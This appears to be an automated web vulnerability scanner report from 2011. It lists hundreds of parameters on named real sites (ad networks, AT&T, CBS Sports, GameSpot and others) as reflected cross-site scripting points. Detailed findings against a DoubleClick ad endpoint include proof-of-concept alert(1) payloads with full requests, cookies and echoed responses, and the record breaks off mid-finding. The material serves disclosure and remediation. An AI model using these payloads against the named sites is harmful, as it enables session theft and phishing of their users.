http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_js.js [admeld_callback parameter]
http://um.simpli.fi/am_match [admeld_adprovider_id parameter]
http://um.simpli.fi/am_match [admeld_callback parameter]
http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]
http://um.simpli.fi/am_redirect_js [admeld_callback parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter]
http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter]
http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [REST URL parameter 4]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [REST URL parameter 4]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter]
http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter]
http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter]
http://wd.sharethis.com/api/getCount2.php [cb parameter]
http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]
http://wd.sharethis.com/api/getCount2.php [url parameter]
http://widgets.digg.com/buttons/count [url parameter]
https://www.att.com/olam/a [REST URL parameter 2]
https://www.att.com/olam/js/cookie.js [REST URL parameter 2]
https://www.att.com/olam/js/cookie.js [REST URL parameter 3]
https://www.att.com/olam/js/flash.js [REST URL parameter 2]
https://www.att.com/olam/js/flash.js [REST URL parameter 3]
https://www.att.com/olam/js/posUtil.js [REST URL parameter 2]
https://www.att.com/olam/js/posUtil.js [REST URL parameter 3]
https://www.att.com/olam/js/registration.js [REST URL parameter 2]
https://www.att.com/olam/js/registration.js [REST URL parameter 3]
https://www.att.com/olam/js/sniffer.js [REST URL parameter 2]
https://www.att.com/olam/js/sniffer.js [REST URL parameter 3]
https://www.att.com/olam/js/tool-tips.js [REST URL parameter 2]
https://www.att.com/olam/js/tool-tips.js [REST URL parameter 3]
https://www.att.com/olam/js/validate.js [REST URL parameter 2]
https://www.att.com/olam/js/validate.js [REST URL parameter 3]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4]
https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5]
https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2]
https://www.att.com/olam/registrationAction.olamexecute [REST URL parameter 2]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]
http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]
http://www.cbssports.com/ads/local-page.html [REST URL parameter 2]
http://www.cbssports.com/data/community/author// [REST URL parameter 1]
http://www.cbssports.com/data/community/author// [REST URL parameter 2]
http://www.cbssports.com/data/community/author// [REST URL parameter 3]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 1]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 2]
http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 3]
http://www.cbssports.com/tennis [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 2]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 3]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 1]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 2]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 3]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 5]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 6]
http://www.gamespot.com/crossdomain.xml [REST URL parameter 1]
http://www.gamespot.com/favicon.ico [REST URL parameter 1]
http://www.gamespot.com/games.html [REST URL parameter 1]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 1]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 2]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 3]
http://www.gamespot.com/pages/hub/modules/topslot_xml.php [REST URL parameter 4]
https://www.issa.org/Members/Log-In.php [issa_connect_url parameter]
https://www.issa.org/Members/Log-In.php [name of an arbitrarily supplied request parameter]
https://www.kryptronic.com/index.php [core--login--password parameter]
https://www.kryptronic.com/index.php [core--login--user parameter]
http://www.last.fm/ajax/getgloballisteners [REST URL parameter 2]
http://www.map-generator.net/ [address parameter]
http://www.map-generator.net/ [name parameter]
http://www.map-generator.net/extmap.php [address parameter]
http://www.map-generator.net/extmap.php [address parameter]
http://www.map-generator.net/extmap.php [name of an arbitrarily supplied request parameter]
http://www.map-generator.net/extmap.php [name parameter]
http://www.map-generator.net/map.php [address parameter]
http://www.map-generator.net/map.php [name parameter]
http://www.maxpreps.com/ScriptResource.axd [d parameter]
http://www.maxpreps.com/WebResource.axd [d parameter]
http://www.maxpreps.com/WebResource.axd [t parameter]
http://www.maxpreps.com/videoview.aspx [videoid parameter]
http://www.mysimon.com/ajax/login/submit/ [next parameter]
http://www.webutation.net/ [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/about [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/contact [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/facebook.de [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/webutation.net [name of an arbitrarily supplied request parameter]
http://www.webutation.net/go/review/xss.cx [name of an arbitrarily supplied request parameter]
http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2]
http://www35.glam.com/gad/glamadapt_psrv.act [;afid parameter]
http://yournorthland.com/aboutUs/careers.asp [area parameter]
http://yournorthland.com/aboutUs/careers.asp [atype parameter]
http://yournorthland.com/aboutUs/careers.asp [office parameter]
http://yournorthland.com/aboutUs/careers.asp [rtCtr parameter]
http://yournorthland.com/aboutUs/eeo.asp [area parameter]
http://yournorthland.com/aboutUs/eeo.asp [atype parameter]
http://yournorthland.com/aboutUs/eeo.asp [office parameter]
http://yournorthland.com/aboutUs/eeo.asp [rtCtr parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [area parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [atype parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [office parameter]
http://yournorthland.com/aboutUs/whoWeAre.asp [rtCtr parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [area parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [atype parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [office parameter]
http://yournorthland.com/custHelp/paymentoptions.asp [rtCtr parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [area parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [atype parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [office parameter]
http://yournorthland.com/custHelp/phoneHelp.asp [rtCtr parameter]
http://yournorthland.com/custhelp/default.asp [area parameter]
http://yournorthland.com/custhelp/default.asp [office parameter]
http://yournorthland.com/custhelp/default.asp [rtCtr parameter]
http://yournorthland.com/scripts/formmail.asp [Email parameter]
http://yournorthland.com/scripts/formmail.asp [_recipients parameter]
http://yournorthland.com/scripts/formmail.asp [_requiredFields parameter]
http://moneywatch.bnet.com/ [Referer HTTP header]
http://moneywatch.bnet.com/money-library/ [Referer HTTP header]
http://moneywatch.bnet.com/money-library/ [Referer HTTP header]
http://www.bnet.com/ [Referer HTTP header]
http://www.bnet.com/ [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.bnet.com/management [Referer HTTP header]
http://www.gamespot.com/ [Referer HTTP header]
http://www.gamespot.com/ [Referer HTTP header]
http://www.gamespot.com/games.html [Referer HTTP header]
https://www.issa.org/Members/Log-In.php [Referer HTTP header]
http://www.metacritic.com/ [Referer HTTP header]
http://www.metacritic.com/games/ [Referer HTTP header]
http://www.tv.com/shows/ [Referer HTTP header]
http://moneywatch.bnet.com/ [XCLGFbrowser cookie]
http://moneywatch.bnet.com/money-library/ [XCLGFbrowser cookie]
http://ocp.cbs.com/pacific/Response.jsp [_PACIFIC_COMMENTS cookie]
http://seg.sharethis.com/getSegment.php [__stid cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie]
http://www.bnet.com/ [XCLGFbrowser cookie]
http://www.bnet.com/management [XCLGFbrowser cookie]
http://www.cbssports.com/ [sjxBeta cookie]
http://www.cbssports.com/ [sjxBeta cookie]
http://www.cbssports.com/tennis [sjxBeta cookie]
http://www.cbssports.com/tennis [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie]
http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie]
http://www.gamespot.com/games.html [XCLGFbrowser cookie]
http://www.ip2location.com/ib2/ [name of an arbitrarily supplied request parameter]
http://www.tv.com/shows/ [XCLGFbrowser cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c9c"-alert(1)-"edfe4a4f26d was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=T
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4c6f"-alert(1)-"ed7ce2bf638 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&eve
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce68e"-alert(1)-"d288f6ef5a2 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_201
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80897"-alert(1)-"d0bb0cf4d58 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
72%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Me
...[SNIP]...

3.5. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa51d"-alert(1)-"1d6c11e2fec was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
77/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http
...[SNIP]...

3.6. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c36"-alert(1)-"b25cda93eb9 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

